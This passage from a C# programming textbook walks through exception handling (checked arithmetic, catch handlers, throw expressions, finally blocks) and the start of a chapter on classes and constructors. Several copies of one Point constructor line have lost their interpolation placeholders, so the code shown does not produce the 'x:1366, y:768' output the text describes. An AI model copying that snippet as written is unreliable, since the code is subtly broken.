private void multiplyValues()
{
    int lhs = int.Parse(lhsOperand.Text);
    int rhs = int.Parse(rhsOperand.Text);
    int outcome = 0;
    outcome = lhs * rhs;
    expression.Text = $"{lhsOperand.Text} * {rhsOperand.Text}";
    result.Text = outcome.ToString();
}
The statement outcome = lhs * rhs; contains the multiplication operation
that is silently overflowing.
6. Edit this statement so that the calculation value is checked, like this:
outcome = checked(lhs * rhs);
The multiplication is now checked and will throw an OverflowException
rather than silently returning the wrong answer.
7. On the Debug menu, click Start Debugging.
8. In the Left Operand box, type 9876543. In the Right Operand box, type
9876543. Click the * Multiplication button, and then click Calculate.
This time, Visual Studio drops into the debugger and reports that the
multiplication resulted in an OverflowException exception. You now
need to add a handler to catch this exception and handle it more
gracefully than just failing with an error.
9. On the Debug menu, click Stop Debugging.
10. In the Code and Text Editor window displaying the MainPage.xaml.cs
file, locate the calculateClick method.
11. Add the following catch handler (shown in bold) immediately after the
existing FormatException catch handler in this method:
private void calculateClick(object sender, RoutedEventArgs e)
{
    try
    {
        ...
    }
    catch (FormatException fEx)
    {
        result.Text = fEx.Message;
    }
    catch (OverflowException oEx)
    {
        result.Text = oEx.Message;
    }
}
The logic of this catch handler is the same as that for the
FormatException catch handler. However, it is still worth keeping these
handlers separate instead of simply writing a generic Exception catch
handler; in the future you might decide to handle these exceptions
differently.
12. On the Debug menu, click Start Debugging to build and run the
application.
13. In the Left Operand box, type 9876543. In the Right Operand box, type
9876543. Click the * Multiplication button, and then click Calculate.
The second catch handler successfully catches the OverflowException
and displays the message “Arithmetic operation resulted in an overflow”
in the Result box.
14. Return to Visual Studio and stop debugging.
Exception handling and the Visual Studio debugger
By default, the Visual Studio debugger only stops an application that is
being debugged and reports exceptions that are unhandled. Sometimes it
is useful to be able to debug exception handlers themselves, and in this
case you need to be able to trace exceptions when they are thrown by
the application, before they are caught. You can easily do this. On the
Debug menu, click Windows and then click Exception Settings. The
Exception Settings pane appears below the Code and Text Editor
window:
In the Exception Settings pane, expand Common Language Runtime
Exceptions, scroll down, and select System.OverflowException:
Now, when exceptions such as OverflowException occur, Visual
Studio will drop into the debugger, and you can use the Step Into button
on the Debug toolbar to step into the catch handler.
Throwing exceptions
Suppose that you are implementing a method called monthName that accepts
a single int argument and returns the name of the corresponding month. For
example, monthName(1) returns “January,” monthName(2) returns
“February,” and so on. The question is, what should the method return if the
integer argument is less than 1 or greater than 12? The best answer is that the
method shouldn’t return anything at all—it should throw an exception. The
.NET Framework class libraries contain lots of exception classes specifically
designed for situations such as this. Most of the time, you will find that one
of these classes describes your exceptional condition. (If not, you can easily
create your own exception class, but you need to know a bit more about the
C# language before you can do that.) In this case, the existing .NET
Framework ArgumentOutOfRangeException class is just right. You can
throw an exception by using a throw statement, as shown in the following
example:
public static string monthName(int month)
{
    switch (month)
    {
        case 1 :
            return "January";
        case 2 :
            return "February";
        ...
        case 12 :
            return "December";
        default :
            throw new ArgumentOutOfRangeException("Bad month");
    }
}
The throw statement needs an exception object to throw. This object
contains the details of the exception, including any error messages. This
example uses an expression that creates a new
ArgumentOutOfRangeException object. The object is initialized with a string
that populates its Message property by using a constructor. Constructors are
covered in detail in Chapter 7, “Creating and managing classes and objects.”
In the following exercises, you will modify the MathsOperators project to
throw an exception if the user attempts to perform a calculation without
selecting a radio button for an operator.
Note This exercise is a little contrived, as any good application design
would have a default radio button selected initially, but this application
is intended to illustrate a point.
Throw an exception
1. Return to Visual Studio 2017.
2. On the Debug menu, click Start Debugging.
3. In the Left Operand box, type 24. In the Right Operand box, type 36,
and then click Calculate.
Nothing appears in the Expression and Result boxes. The fact that you
have not selected an operator option is not immediately obvious. It
would be useful to write a diagnostic message in the Result box.
4. Return to Visual Studio and stop debugging.
5. In the Code and Text Editor window displaying MainPage.xaml.cs,
locate and examine the calculateClick method, which should currently
look like this:
private void calculateClick(object sender, RoutedEventArgs e)
{
    try
    {
        if ((bool)addition.IsChecked)
        {
            addValues();
        }
        else if ((bool)subtraction.IsChecked)
        {
            subtractValues();
        }
        else if ((bool)multiplication.IsChecked)
        {
            multiplyValues();
        }
        else if ((bool)division.IsChecked)
        {
            divideValues();
        }
        else if ((bool)remainder.IsChecked)
        {
            remainderValues();
        }
    }
    catch (FormatException fEx)
    {
        result.Text = fEx.Message;
    }
    catch (OverflowException oEx)
    {
        result.Text = oEx.Message;
    }
}
The addition, subtraction, multiplication, division, and remainder fields
are the buttons that appear on the form. Each button has a property
called IsChecked that indicates whether the user has selected it. The
IsChecked property is a nullable Boolean that has the value true if the
button is selected or false otherwise. (You learn more about nullable
values in Chapter 8, “Understanding values and references.”) The
cascading if statement examines each button, in turn, to find which one
is selected. (The radio buttons are mutually exclusive, so the user can
select at most one radio button.) If none of the buttons is
selected, none of the if statements will be true and none of the
calculation methods are called.
You could try to solve the problem by adding one more else statement
to the if-else cascade to write a message to the result text box on the
form, but a better solution is to separate the detection and signaling of an
error from the catching and handling of that error.
6. Add another else statement to the end of the list of if-else statements and
throw an InvalidOperationException, as shown in bold in the following
code:
if ((bool)addition.IsChecked)
{
    addValues();
}
...
else if ((bool)remainder.IsChecked)
{
    remainderValues();
}
else
{
    throw new InvalidOperationException("No operator selected");
}
7. On the Debug menu, click Start Debugging to build and run the
application.
8. In the Left Operand box, type 24. In the Right Operand box, type 36,
and then click Calculate.
Visual Studio detects that your application has thrown an
InvalidOperationException, and an exception dialog box opens. Your
application has thrown an exception, but the code does not catch it yet.
9. On the Debug menu, click Stop Debugging.
Now that you have written a throw statement and verified that it throws an
exception, you will write a catch handler to handle this exception.
Catch the exception
1. In the Code and Text Editor window displaying MainPage.xaml.cs, add
the following catch handler shown in bold immediately below the two
existing catch handlers in the calculateClick method:
...
catch (FormatException fEx)
{
    result.Text = fEx.Message;
}
catch (OverflowException oEx)
{
    result.Text = oEx.Message;
}
catch (InvalidOperationException ioEx)
{
    result.Text = ioEx.Message;
}
This code catches the InvalidOperationException that is thrown when
the user fails to select an operator radio button.
2. On the Debug menu, click Start Debugging.
3. In the Left Operand box, type 24. In the Right Operand box, type 36,
and then click Calculate.
The message “No operator selected” appears in the Result box.
Note If your application drops into the Visual Studio debugger,
you have probably enabled Visual Studio to catch all common
language runtime exceptions as they are thrown. If this happens, on
the Debug menu, click Continue. Remember to disable Visual
Studio from catching CLR exceptions as they are thrown when you
have finished this exercise!
4. Return to Visual Studio and stop debugging.
The application is now a lot more robust. However, several exceptions
could still arise that are not caught and will cause the application to fail. For
example, if you attempt to divide by 0, an unhandled DivideByZeroException
will be thrown. (Integer division by 0 does throw an exception, unlike
floating-point division by 0.) One way to solve this problem is to write an
ever-larger number of catch handlers inside the calculateClick method.
Another solution is to add a general catch handler that catches Exception at
the end of the list of catch handlers. This will trap all unexpected exceptions
that you might have forgotten about, or that might be caused as a result of
truly unusual circumstances.
Note Using a catchall handler to trap the Exception exception is not an
excuse to omit catching specific exceptions. The more definite you can
be in your exception handling, the easier it will be to maintain your
code and spot the causes of any underlying or commonly recurring
issues. Only use the Exception exception for cases that are really…
well, exceptional. For the following exercise, the “divide by zero”
exception falls into this category. However, having established that this
exception is a distinct possibility in a professional application, good
practice would be to add a handler for the DivideByZeroException
exception to the application.
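The following standalone sketch shows what such a handler looks like in action (the divisor is parsed at run time so that the compiler does not reject the division outright):

int dividend = 24;
int divisor = int.Parse("0");
try
{
    int outcome = dividend / divisor; // throws DivideByZeroException
    Console.WriteLine(outcome);
}
catch (DivideByZeroException dbzEx)
{
    Console.WriteLine(dbzEx.Message); // "Attempted to divide by zero."
}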
Catch unhandled exceptions
1. In the Code and Text Editor window displaying MainPage.xaml.cs, add
the following catch handler to the end of the list of existing catch
handlers in the calculateClick method:
catch (Exception ex)
{
    result.Text = ex.Message;
}
This catch handler will catch all hitherto unhandled exceptions,
whatever their specific type.
2. On the Debug menu, click Start Debugging.
You will now attempt to perform some calculations known to cause
exceptions and confirm that they are all handled correctly.
3. In the Left Operand box, type 24. In the Right Operand box, type 36,
and then click Calculate.
Confirm that the diagnostic message “No operator selected” still appears
in the Result box. This message was generated by the
InvalidOperationException handler.
4. In the Left Operand box, type John, click the + Addition button and
then click Calculate.
Confirm that the diagnostic message “Input string was not in a correct
format” appears in the Result box. This message was generated by the
FormatException handler.
5. In the Left Operand box, type 24. In the Right Operand box, type 0.
Click the / Division button, and then click Calculate.
Confirm that the diagnostic message “Attempted to divide by zero”
appears in the Result box. This message was generated by the general
Exception handler.
6. Experiment with other combinations of values, and verify that exception
conditions are handled without causing the application to stop.
7. When you have finished, return to Visual Studio and stop debugging.
Using throw expressions
A throw expression is semantically similar to a throw statement, except that it
can be used anywhere you can use an expression. For example, suppose you
want to set the string variable name to the value entered into the nameField
text box on a form, but only if the user has actually entered a value into that
field; otherwise, you want to throw a “Missing input” exception. You could
use the following code:
string name;
if (nameField.Text != "")
{
    name = nameField.Text;
}
else
{
    throw new Exception("Missing input"); // this is a throw statement
}
Although this code does the job, it is a little ungainly and verbose. You
can simplify this block by using a throw expression together with another
operator called the “query-colon” or ?:. The query-colon operator acts like an
inline if…else statement for an expression. It is a ternary operator that takes
the following three operands: a Boolean expression, an expression to evaluate
and return if the Boolean expression is true, and another expression to
evaluate and return if the Boolean expression is false. You can use it with a
throw expression like this:
string name = nameField.Text != "" ? nameField.Text :
    throw new Exception("Missing input"); // this is a throw expression
In this case, if the nameField text box is not empty the value of the Text
property is stored in the name variable. Otherwise the throw expression is
evaluated, which in turn, throws an exception. This code is much more
concise than the previous example.
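A throw expression also combines naturally with the null-coalescing (??) operator. A minimal sketch, assuming a string variable named text that might be null:

string text = null;
string name = text ?? throw new Exception("Missing input");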
Using a finally block
It is important to remember that when an exception is thrown, it changes the
flow of execution through the program. This means that you can’t guarantee
that a statement will always run when the previous statement finishes because
the previous statement might throw an exception. Remember that in this case,
after the catch handler has run, the flow of control resumes at the next
statement in the block holding this handler and not at the statement
immediately following the code that raised the exception.
Look at the example that follows, which is adapted from the code in
Chapter 5, “Using compound assignment and iteration statements.” It’s very
easy to assume that the call to reader.Dispose will always occur when the
while loop completes. After all, it’s right there in the code.
TextReader reader = ...;
...
string line = reader.ReadLine();
while (line != null)
{
    ...
    line = reader.ReadLine();
}
reader.Dispose();
Sometimes, it’s not an issue if one particular statement does not run, but
on many occasions, it can be a big problem. If the statement releases a
resource that was acquired in a previous statement, failing to execute this
statement results in the resource being retained. This example is just such a
case: when you open a file for reading, this operation acquires a resource (a
file handle), and you must ensure that you call reader.Dispose to release the
resource. If you don’t, sooner or later you’ll run out of file handles and be
unable to open more files. If you find that file handles are too trivial, think of
database connections instead.
The way to ensure that a statement is always run, whether or not an
exception has been thrown, is to write that statement inside a finally block. A
finally block occurs immediately after a try block or immediately after the
last catch handler after a try block. As long as the program enters the try
block associated with a finally block, the finally block will always be run,
even if an exception occurs. If an exception is thrown and caught locally, the
exception handler executes first, followed by the finally block. If the
exception is not caught locally (that is, the runtime has to search through the
list of calling methods to find a handler), the finally block runs first. The
important point is that the finally block always executes.
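You can see this ordering in a minimal console sketch (not part of the exercise code); the catch handler runs first, and then the finally block:

try
{
    throw new Exception("Something went wrong");
}
catch (Exception ex)
{
    Console.WriteLine("catch: " + ex.Message); // runs first
}
finally
{
    Console.WriteLine("finally"); // always runs
}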
The solution to the reader.Dispose problem is as follows:
TextReader reader = ...;
...
try
{
    string line = reader.ReadLine();
    while (line != null)
    {
        ...
        line = reader.ReadLine();
    }
}
finally
{
    if (reader != null)
    {
        reader.Dispose();
    }
}
Even if an exception occurs while reading the file, the finally block
ensures that the reader.Dispose statement always executes. You’ll see
another way to handle this situation in Chapter 14, “Using garbage collection
and resource management.”
Summary
In this chapter, you learned how to catch and handle exceptions by using the
try and catch constructs. You saw how to turn on and off integer overflow
checking by using the checked and unchecked keywords. You learned how to
throw an exception if your code detects an exceptional situation, and you saw
how to use a finally block to ensure that critical code always runs, even if an
exception occurs.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 7.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Catch a specific exception
Write a catch handler that catches the
specific exception class. For example:
try
{
...
}
catch (FormatException fEx)
{
...
}
Ensure that integer arithmetic is
always checked for overflow
Use the checked keyword. For
example:
int number = Int32.MaxValue;
checked { number++; }
Throw an exception
Use a throw statement. For example:
throw new FormatException(source);
Catch all exceptions in a single
catch handler
Write a catch handler that catches
Exception. For example:
try
{
...
}
catch (Exception ex)
{
...
}
Ensure that some code will always
run, even if an exception is thrown
Write the code within a finally block.
For example:
try
{
...
}
finally
{
// always run
}
PART II
Understanding the C# object model
In Part I, you learned how to declare variables, use operators to create values,
call methods, and write many of the statements you need when you
implement a method. You now know enough to progress to the next stage:
combining methods and data into your own functional data structures. The
chapters in Part II show you how to do this.
In Part II, you’ll learn about classes and structures, the two fundamental
types that you use to model the entities and other items that constitute a
typical C# application. In particular, you’ll see how C# creates objects and
value types based on the definitions of classes and structures, and how the
common language runtime (CLR) manages the life cycle of these items. You
will find out how to create families of classes by using inheritance, and you
will learn how to aggregate items by using arrays.
CHAPTER 7
Creating and managing classes and
objects
After completing this chapter, you will be able to:
Define a class containing a related set of methods and data items.
Control the accessibility of members by using the public and private
keywords.
Create objects by using the new keyword to invoke a constructor.
Write and call your own constructors.
Create methods and data that can be shared by all instances of the same
class by using the static keyword.
Explain how to create anonymous classes.
The Windows Runtime together with the Microsoft .NET Framework
contains thousands of classes. You have used a number of them already,
including Console and Exception. Classes provide a convenient mechanism
for modeling the entities manipulated by applications. An entity can represent
a specific item, such as a customer, or something more abstract, such as a
transaction. Part of the design process for any system focuses on determining
the entities that are important to the processes that the system implements and
then performing an analysis to see what information these entities need to
hold and what operations they should perform. You store the information that
a class holds as fields and use methods to implement the operations that a
class can perform.
Understanding classification
Class is the root word of the term classification. When you design a class,
you systematically arrange information and behavior into a meaningful
entity. This arranging is an act of classification and is something that
everyone does, not just programmers. For example, all cars share common
behaviors (they can be steered, stopped, accelerated, and so on) and common
attributes (they have a steering wheel, an engine, and so on). People use the
word car to mean an object that shares these common behaviors and
attributes. As long as everyone agrees on what a word means, this system
works well, and you can express complex but precise ideas in a concise form.
Without classification, it’s hard to imagine how people could think or
communicate at all.
Given that classification is so deeply ingrained in the way we think and
communicate, it makes sense to try to write programs by classifying the
different concepts inherent in a problem and its solution and then modeling
these classes in a programming language. This is exactly what you can do
with object-oriented programming languages, including Microsoft Visual C#.
The purpose of encapsulation
Encapsulation is an important principle when defining classes. The idea is
that a program that uses a class should not have to account for how that class
actually works internally; the program simply creates an instance of a class
and calls the methods of that class. As long as those methods do what they
are designed to do, the program does not need to know how they are
implemented. For example, when you call the Console.WriteLine method,
you don’t want to be bothered with all the intricate details of how the
Console class physically arranges for data to be written to the screen. A class
might need to maintain all sorts of internal state information to perform its
various methods. This additional state information and activity is hidden from
the program that is using the class. Therefore, encapsulation is sometimes
referred to as information hiding. Encapsulation actually has two purposes:
To combine methods and data within a class; in other words, to support
classification
To control the accessibility of the methods and data; in other words, to
control the use of the class
Defining and using a class
In C#, you use the class keyword to define a new class. The data and methods
of the class occur in the body of the class between a pair of braces. Following
is a C# class called Circle that contains one method (to calculate the circle’s
area) and one piece of data (the circle’s radius):
class Circle
{
int radius;
double Area()
{
return Math.PI * radius * radius;
}
}
Note The Math class contains methods for performing mathematical
calculations and fields containing mathematical constants. The Math.PI
field contains the value 3.14159265358979, which is an approximation
of the value of pi.
The body of a class contains ordinary methods (such as Area) and fields
(such as radius). Recall from early on in the book that variables in a class are
called fields. Chapter 2, “Working with variables, operators, and
expressions,” shows how to declare variables, and Chapter 3, “Writing
methods and applying scope,” demonstrates how to write methods, so there’s
almost no new syntax here.
You can use the Circle class like you have used the other types you have
already met. You create a variable specifying Circle as its type, and then you
initialize the variable with some valid data. Here is an example:
Circle c; // Create a Circle variable
c = new Circle(); // Initialize it
A point worth highlighting in this code is the use of the new keyword.
Previously, when you initialized a variable such as an int or a float, you
simply assigned it a value:
int i;
i = 42;
You cannot do the same with variables of class types. One reason for this
is that C# just doesn’t provide the syntax for assigning literal class values to
variables. You cannot write a statement such as this:
Circle c;
c = 42;
After all, what is the Circle equivalent of 42? Another reason concerns the
way in which memory for variables of class types is allocated and managed
by the runtime—this is discussed further in Chapter 8, “Understanding values
and references.” For now, just accept that the new keyword creates a new
instance of a class, more commonly called an object.
You can, however, directly assign an instance of a class to another
variable of the same type, like this:
Circle c;
c = new Circle();
Circle d;
d = c;
However, this is not as straightforward as it might first appear, for reasons
that are described in Chapter 8.
Important Don’t confuse the terms class and object. A class is the
definition of a type. An object is an instance of that type created when
the program runs. Several different objects can be instances of the same
class.
Controlling accessibility
Surprisingly, the Circle class is currently of no practical use. By default,
when you encapsulate your methods and data within a class, the class forms a
boundary to the outside world. Fields (such as radius) and methods (such as
Area) defined in the class can be used by other methods inside the class but
not by the outside world; they are private to the class. So, although you can
create a Circle object in a program, you cannot access its radius field or call
its Area method, which is why the class is not of much use—yet! However,
you can modify the definition of a field or method with the public and private
keywords to control whether it is accessible from the outside:
A method or field is private if it is accessible only from within the
class. To declare that a method or field is private, you write the
keyword private before its declaration. As intimated previously, this is
actually the default, but it is good practice to state explicitly that fields
and methods are private to avoid any confusion.
A method or field is public if it is accessible both within and from
outside the class. To declare that a method or field is public, you write
the keyword public before its declaration.
Here is the Circle class again. This time, Area is declared as a public
method and radius is declared as a private field:
class Circle
{
private int radius;
public double Area()
{
return Math.PI * radius * radius;
}
}
Note If you are a C++ programmer, be aware that no colon appears after
the public and private keywords. You must repeat the keyword for
every field and method declaration.
Although radius is declared as a private field and is not accessible from
outside the class, radius is accessible within the Circle class. The Area
method is inside the Circle class, so the body of Area has access to radius.
However, the class is still of limited value because there is no way of
initializing the radius field. To fix this, you can use a constructor.
Tip Remember that variables declared in a method are not initialized by
default. However, the fields in a class are automatically initialized to 0,
false, or null, depending on their type. Nonetheless, it is still good
practice to provide an explicit means of initializing fields.
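For example, the fields in the following sketch (a hypothetical class shown only to illustrate the default values) are initialized automatically when an object is created:
class Defaults
{
    private int count;   // automatically initialized to 0
    private bool ready;  // automatically initialized to false
    private string name; // automatically initialized to null
}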
Naming and accessibility
Many organizations have their own house style that they ask developers
to follow when they write code. Part of this style often involves rules
for naming identifiers. Typically, the purpose of these rules is to make
the code easier to maintain. The following recommendations are
reasonably common and relate to the naming conventions for fields and
methods based on the accessibility of class members; however, C# does
not enforce these rules:
Identifiers that are public should start with a capital letter. For
example, Area starts with A (not a) because it’s public. This
system is known as the PascalCase naming scheme (because it
was first used in the Pascal language).
Identifiers that are not public (which include local variables)
should start with a lowercase letter. For example, radius starts
with r (not R) because it’s private. This system is known as the
camelCase naming scheme.
Note Some organizations use the camelCase scheme only for
methods and adopt the convention to name private fields starting
with an underscore character, such as _radius. However, the
examples in this book use camelCase naming for private methods
and fields.
There’s only one exception to this rule: class names should start with
a capital letter, and constructors must match the name of their class
exactly; therefore, a private constructor must start with a capital letter.
Important Don’t declare two public class members whose names differ
only in case. If you do, developers using other languages that are not
case-sensitive (such as Microsoft Visual Basic) might not be able to
integrate your class into their solutions.
Working with constructors
When you use the new keyword to create an object, the runtime needs to
construct that object by using the definition of the class. The runtime must
grab a piece of memory from the operating system, fill it with the fields
defined by the class, and then invoke a constructor to perform any
initialization required.
A constructor is a special method that runs automatically when you create
an instance of a class. It has the same name as the class, and it can take
parameters, but it cannot return a value (not even void). Every class must
have a constructor. If you don’t write one, the compiler automatically
generates a default constructor for you. (However, the compiler-generated
default constructor doesn’t actually do anything.) You can write your own
default constructor quite easily. Just add a public method that does not return
a value and give it the same name as the class. The following example shows
the Circle class with a default constructor that initializes the radius field to 0:
class Circle
{
private int radius;
public Circle() // default constructor
{
radius = 0;
}
public double Area()
{
return Math.PI * radius * radius;
}
}
Note In C# parlance, the default constructor is a constructor that does
not take any parameters. Regardless of whether the compiler generates
the default constructor or you write it yourself, a constructor that does
not take any parameters is still the default constructor. You can also
write nondefault constructors (constructors that do take parameters), as
you will see in the upcoming section “Overloading constructors.”
In this example, the constructor is marked public. If this keyword is
omitted, the constructor will be private (just like any other method and field).
If the constructor is private, it cannot be used outside the class, which
prevents you from being able to create Circle objects from methods that are
not part of the Circle class. You might, therefore, think that private
constructors are not that valuable. They do have their uses, but they are
beyond the scope of the current discussion.
Having added a public constructor, you can now use the Circle class and
exercise its Area method. Notice how you use dot notation to invoke the Area
method on a Circle object:
Circle c;
c = new Circle();
double areaOfCircle = c.Area();
Overloading constructors
You’re almost finished, but not quite. You can now declare a Circle variable,
use it to reference a newly created Circle object, and then call its Area
method. However, there is one last problem. The area of all Circle objects
will always be 0 because the default constructor sets the radius to 0 and it
stays at 0; the radius field is private, and there is no easy way of changing its
value after it has been initialized. A constructor is just a special kind of
method, and it—like all methods—can be overloaded. Just as there are
several versions of the Console.WriteLine method, each of which takes
different parameters, so too can you write different versions of a constructor.
So, you can add another constructor to the Circle class with a parameter that
specifies the radius to use, like this:
class Circle
{
private int radius;
public Circle() // default constructor
{
radius = 0;
}
public Circle(int initialRadius) // overloaded constructor
{
radius = initialRadius;
}
public double Area()
{
return Math.PI * radius * radius;
}
}
Note The order of the constructors in a class is immaterial; you can
define constructors in the order with which you feel most comfortable.
You can then use this constructor when you create a new Circle object,
such as in the following:
Circle c;
c = new Circle(45);
When you build the application, the compiler works out which constructor
it should call based on the parameters that you specify to the new operator. In
this example, you passed an int, so the compiler generates code that invokes
the constructor that takes an int parameter.
You should be aware of an important feature of the C# language: if you
write your own constructor for a class, the compiler does not generate a
default constructor. Therefore, if you’ve written your own constructor that
accepts one or more parameters and you also want a default constructor,
you’ll have to write the default constructor yourself.
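The following sketch illustrates the point; the comments indicate what the compiler accepts and what it rejects:
class Circle
{
    private int radius;
    public Circle(int initialRadius) // now the only constructor
    {
        radius = initialRadius;
    }
}
...
Circle c = new Circle(45); // OK: matches the constructor that takes an int
Circle d = new Circle();   // Compile-time error: no default constructor exists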
Partial classes
A class can contain a number of methods, fields, and constructors, as
well as other items discussed in later chapters. A highly functional class
can become quite large. With C#, you can split the source code for a
class into separate files so that you can organize the definition of a large
class into smaller pieces that are easier to manage. This feature is used
by Visual Studio 2017 for Universal Windows Platform (UWP) apps,
where the source code that the developer can edit is maintained in a
separate file from the code that is generated by Visual Studio whenever
the layout of a form changes.
When you split a class across multiple files, you define the parts of
the class by using the partial keyword in each file. For example, if the
Circle class is split between two files called circ1.cs (containing the
constructors) and circ2.cs (containing the methods and fields), the
contents of circ1.cs look like this:
partial class Circle
{
public Circle() // default constructor
{
this.radius = 0;
}
public Circle(int initialRadius) // overloaded constructor
{
this.radius = initialRadius;
}
}
The contents of circ2.cs look like this:
partial class Circle
{
private int radius;
public double Area()
{
return Math.PI * this.radius * this.radius;
}
}
When you compile a class that has been split into separate files, you
must provide all the files to the compiler.
In the following exercise, you will declare a class that models a point in
two-dimensional space. The class will contain two private fields for holding
the x- and y-coordinates of a point and will provide constructors for
initializing these fields. You will create instances of the class by using the
new keyword and calling the constructors.
Write constructors and create objects
1. Start Visual Studio 2017 if it is not already running.
2. Open the Classes solution, which is located in the \Microsoft
Press\VCSBS\Chapter 7\Classes folder in your Documents folder.
3. In Solution Explorer, double-click the file Program.cs to display it in the
Code and Text Editor window.
4. In the Program class, locate the Main method.
The Main method calls the doWork method, which is wrapped in a try
block and followed by a catch handler. With this try/catch block, you
can write the code that would typically go inside Main in the doWork
method instead, and be safe in the knowledge that it will catch and
handle any exceptions. The doWork method currently contains nothing
but a // TODO: comment.
Tip Developers frequently add TODO comments as a reminder that
they have left a piece of code to revisit. These comments often
have a description of the work to be performed, such as // TODO:
Implement the doWork method. Visual Studio recognizes this form
of comment, and you can quickly locate them anywhere in an
application by using the Task List window. To display this
window, on the View menu, click Task List. The Task List
window opens below the Code and Text Editor window by default.
All the TODO comments will be listed. You can then double-click
any of these comments to go directly to the corresponding code,
which will be displayed in the Code and Text Editor window.
5. Display the file Point.cs in the Code and Text Editor window.
This file defines a class called Point, which you will use to represent the
location of a point in two-dimensional space, defined by a pair of x- and
y-coordinates. The Point class is currently empty apart from another //
TODO: comment.
6. Return to the Program.cs file. In the Program class, edit the body of the
doWork method, and replace the // TODO: comment with the following
statement:
Point origin = new Point();
This statement creates a new instance of the Point class and invokes its
default constructor.
7. On the Build menu, click Build Solution.
The code builds without error because the compiler automatically
generates the code for a default constructor for the Point class. However,
you cannot see the C# code for this constructor because the compiler
does not generate any source language statements.
8. Return to the Point class in the file Point.cs. Replace the // TODO:
comment with a public constructor that accepts two int arguments,
called x and y, and that calls the Console.WriteLine method to display
the values of these arguments to the console, as shown in bold type in
the following code example:
class Point
{
public Point(int x, int y)
{
Console.WriteLine($"x:, y:");
}
}
9. On the Build menu, click Build Solution.
The compiler now reports an error:
There is no argument that corresponds to the required formal
parameter 'x' of
'Point.Point(int, int)'
What this rather verbose message means is that the call to the default
constructor in the doWork method is now invalid because there is no
longer a default constructor. You have written your own constructor for
the Point class, so the compiler does not generate the default
constructor. You will now fix this by writing your own default
constructor.
10. Edit the Point class by adding a public default constructor that calls
Console.WriteLine to write the string “Default constructor called” to the
console, as shown in bold type in the example that follows. The Point
class should now look like this:
class Point
{
public Point()
{
Console.WriteLine("Default constructor called");
}
public Point(int x, int y)
{
Console.WriteLine($"x:, y:");
}
}
11. On the Build menu, click Build Solution.
The program should now build successfully.
12. In the Program.cs file, edit the body of the doWork method. Declare a
variable called bottomRight of type Point, and initialize it to a new Point
object by using the constructor with two arguments, as shown in bold
type in the code that follows. Supply the values 1366 and 768,
representing the coordinates at the lower-right corner of the screen based
on the resolution 1366 × 768 (a common resolution for many tablet
devices). The doWork method should now look like this:
static void doWork()
{
Point origin = new Point();
Point bottomRight = new Point(1366, 768);
}
13. On the Debug menu, click Start Without Debugging.
The program builds and runs, displaying the messages “Default
constructor called” and “x:1366, y:768” in the console window.
14. Press the Enter key to end the program and return to Visual Studio 2017.
You will now add two int fields to the Point class to represent the x- and
y-coordinates of a point, and you will modify the constructors to
initialize these fields.
15. Edit the Point class in the Point.cs file and add two private fields, called
x and y, of type int, as shown in bold type in the code that follows. The
Point class should now look like this:
class Point
{
private int x, y;
public Point()
{
Console.WriteLine( "default constructor called ");
}
public Point(int x, int y)
{
Console.WriteLine($"x:, y:");
}
}
You will modify the second Point constructor to initialize the x and y
fields to the values of the x and y parameters. However, there is a
potential trap when you do this. If you are not careful, the constructor
could look like this:
public Point(int x, int y) // Don't type this!
{
x = x;
y = y;
}
Although this code will compile, these statements appear to be
ambiguous. How does the compiler know in the statement x = x; that the
first x is the field and the second x is the parameter? The answer is that it
doesn’t! A method parameter with the same name as a field hides the
field for all statements in the method. All this code actually does is
assign the parameters to themselves; it does not modify the fields at all.
This is clearly not what you want.
The solution is to use the this keyword to qualify which variables are
parameters and which are fields. Prefixing a variable with this means
“the field in this object.”
16. Modify the Point constructor that takes two parameters by replacing the
Console.WriteLine statement with the following code shown in bold
type:
public Point(int x, int y)
{
this.x = x;
this.y = y;
}
17. Edit the default Point constructor to initialize the x and y fields to -1, as
follows in bold type. Note that although there are no parameters to cause
confusion (and Visual Studio will pop up a tooltip stating that you don’t
need to use this), it is still good practice to qualify the field references in
this way:
public Point()
{
this.x = -1;
this.y = -1;
}
18. On the Build menu, click Build Solution. Confirm that the code
compiles without errors or warnings. (You can run it, but it does not
produce any output.)
Methods that belong to a class and that operate on the data belonging to a
particular instance of a class are called instance methods. (You will learn
about other types of methods later in this chapter.) In the following exercise,
you will write an instance method for the Point class, called DistanceTo,
which calculates the distance between two points.
Write and call instance methods
1. In the Classes project in Visual Studio 2017, add the following public
instance method called DistanceTo to the Point class after the
constructors. The method accepts a single Point argument called other
and returns a double.
The DistanceTo method should look like this:
class Point
{
...
public double DistanceTo(Point other)
{
}
}
In the following steps, you will add code to the body of the DistanceTo
instance method to calculate and return the distance between the Point
object being used to make the call and the Point object passed as a
parameter. To do this, you must calculate the difference between the x-
coordinates and the y-coordinates.
2. In the DistanceTo method, declare a local int variable called xDiff and
initialize it with the difference between this.x and other.x, as shown
below in bold type:
public double DistanceTo(Point other)
{
int xDiff = this.x - other.x;
}
3. Declare another local int variable called yDiff and initialize it with the
difference between this.y and other.y, as shown here in bold type:
public double DistanceTo(Point other)
{
int xDiff = this.x - other.x;
int yDiff = this.y - other.y;
}
Note Although the x and y fields are private, other instances of the
same class can still access them. It is important to understand that
the term private operates at the class level and not at the object
level; two objects that are instances of the same class can access
each other’s private data, but objects that are instances of another
class cannot.
To calculate the distance, you can use Pythagoras’ theorem and calculate
the square root of the sum of the square of xDiff and the square of yDiff.
The System.Math class provides the Sqrt method that you can use to
calculate square roots.
4. Declare a variable called distance of type double and use it to hold the
result of the calculation just described:
public double DistanceTo(Point other)
{
int xDiff = this.x - other.x;
int yDiff = this.y - other.y;
double distance = Math.Sqrt((xDiff * xDiff) + (yDiff * yDiff));
}
5. Add a return statement to the end of the DistanceTo method and return
the value in the distance variable:
public double DistanceTo(Point other)
{
int xDiff = this.x - other.x;
int yDiff = this.y - other.y;
double distance = Math.Sqrt((xDiff * xDiff) + (yDiff * yDiff));
return distance;
}
You will now test the DistanceTo method.
6. Return to the doWork method in the Program class. After the statements
that declare and initialize the origin and bottomRight Point variables,
declare a variable called distance of type double. Initialize this double
variable with the result obtained when you call the DistanceTo method
on the origin object, passing the bottomRight object to it as an argument.
The doWork method should now look like this:
static void doWork()
{
Point origin = new Point();
Point bottomRight = new Point(1366, 768);
double distance = origin.DistanceTo(bottomRight);
}
Note Microsoft IntelliSense should display the DistanceTo method
when you type the period character after origin.
7. Add to the doWork method another statement that writes the value of the
distance variable to the console by using the Console.WriteLine method.
The completed doWork method should look like this:
static void doWork()
{
Point origin = new Point();
